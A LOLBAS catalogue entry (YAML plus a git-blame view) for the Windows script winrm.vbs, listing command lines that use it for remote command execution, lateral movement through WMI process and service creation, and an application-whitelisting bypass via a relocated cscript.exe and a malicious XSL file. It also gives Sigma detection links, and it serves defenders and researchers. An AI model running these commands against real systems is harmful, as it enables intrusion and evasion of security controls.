LOLBAS/yml/OSScripts/Winrm.yml

---
Name: winrm.vbs
Description: Script used for manage Windows RM settings
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
  - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'
    Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
    Usecase: Proxy execution
    Category: Execute
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
  - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
    Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
    Usecase: Proxy execution
    Category: Execute
    Privileges: Admin
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
  - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
    Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.
    Usecase: Execute arbitrary, unsigned code via XSL script
    Category: AWL Bypass
    Privileges: User
    MitreID: T1220
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\winrm.vbs
  - Path: C:\Windows\SysWOW64\winrm.vbs
Code_Sample:
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Resources:
  - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
  - Link: https://www.youtube.com/watch?v=3gz1QmiMhss
  - Link: https://github.com/enigma0x3/windows-operating-system-archaeology
  - Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/
  - Link: https://twitter.com/bohops/status/994405551751815170
  - Link: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
  - Link: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
  - Person: Matt Nelson
    Handle: '@enigma0x3'
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: Jimmy
    Handle: '@bohops'
  - Person: Red Canary Company cc Tony Lambert
    Handle: '@redcanaryco'
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`---`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`Name: winrm.vbs`
			`Description: Script used for manage Windows RM settings`
			`Author: 'Oddvar Moe'`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Created: 2018-05-25`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Commands:`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`- Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'`
			`Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol`
			`Usecase: Proxy execution`
			`Category: Execute`
			`Privileges: User`
			`MitreID: T1216`
Updating entries that have been confirmed to be working on Windows 11 (21H2) 2021-12-14 16:50:17 +01:00			`OperatingSystem: Windows 10, Windows 11`
Fixing various issues identified 2021-12-14 17:50:22 +01:00			`- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol`
			`Usecase: Proxy execution`
			`Category: Execute`
Fixing various issues identified 2021-12-14 17:50:22 +01:00			`Privileges: Admin`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`MitreID: T1216`
Updating entries that have been confirmed to be working on Windows 11 (21H2) 2021-12-14 16:50:17 +01:00			`OperatingSystem: Windows 10, Windows 11`
Errors in YAML files corrected 2018-10-25 21:24:55 +02:00			`- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'`
Addressing @bohops's feedback 2022-05-05 12:12:22 +02:00			`Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.`
			`Usecase: Execute arbitrary, unsigned code via XSL script`
Added AWL Bypass 2018-10-04 16:07:02 +02:00			`Category: AWL Bypass`
			`Privileges: User`
Addressing @bohops's feedback 2022-05-05 12:12:22 +02:00			`MitreID: T1220`
Updating entries that have been confirmed to be working on Windows 11 (21H2) 2021-12-14 16:50:17 +01:00			`OperatingSystem: Windows 10, Windows 11`
Major changes to Web portal - Small fixes to source files to adjust 2018-12-10 14:28:12 +01:00			`Full_Path:`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`- Path: C:\Windows\System32\winrm.vbs`
			`- Path: C:\Windows\SysWOW64\winrm.vbs`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Code_Sample:`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg`
			`- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct`
			`Detection:`
$frack113$ Update old sigma link (#303) * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> --------- Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> 2023-10-18 17:30:34 +02:00			`- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml`
			`- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml`
			`- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml`
Detection Resources and Other Updates (#179) * Add detection links for scripts * Add detection links for OtherMSBins. Fixed and updated as needed. * Add detection links for MSBins. Fixed and updated as needed. * Add detection links for oslibraries * Updating template for Detections * Removing empty Detection:Sigma entries * Remove redundant blank line * Replacing commit URL with file URL Co-authored-by: root <root@DESKTOP-5CR935D.localdomain> Co-authored-by: Wietze <wietze@users.noreply.github.com> 2021-11-15 14:19:03 +01:00			`- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Resources:`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`- Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology`
			`- Link: https://www.youtube.com/watch?v=3gz1QmiMhss`
			`- Link: https://github.com/enigma0x3/windows-operating-system-archaeology`
			`- Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/`
			`- Link: https://twitter.com/bohops/status/994405551751815170`
Added AWL Bypass 2018-10-04 16:07:02 +02:00			`- Link: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404`
			`- Link: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`Acknowledgement:`
Added Acknowledgement 2018-10-04 16:08:21 +02:00			`- Person: Matt Graeber`
			`Handle: '@mattifestation'`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`- Person: Matt Nelson`
			`Handle: '@enigma0x3'`
			`- Person: Casey Smith`
			`Handle: '@subtee'`
			`- Person: Jimmy`
			`Handle: '@bohops'`
			`- Person: Red Canary Company cc Tony Lambert`
			`Handle: '@redcanaryco'`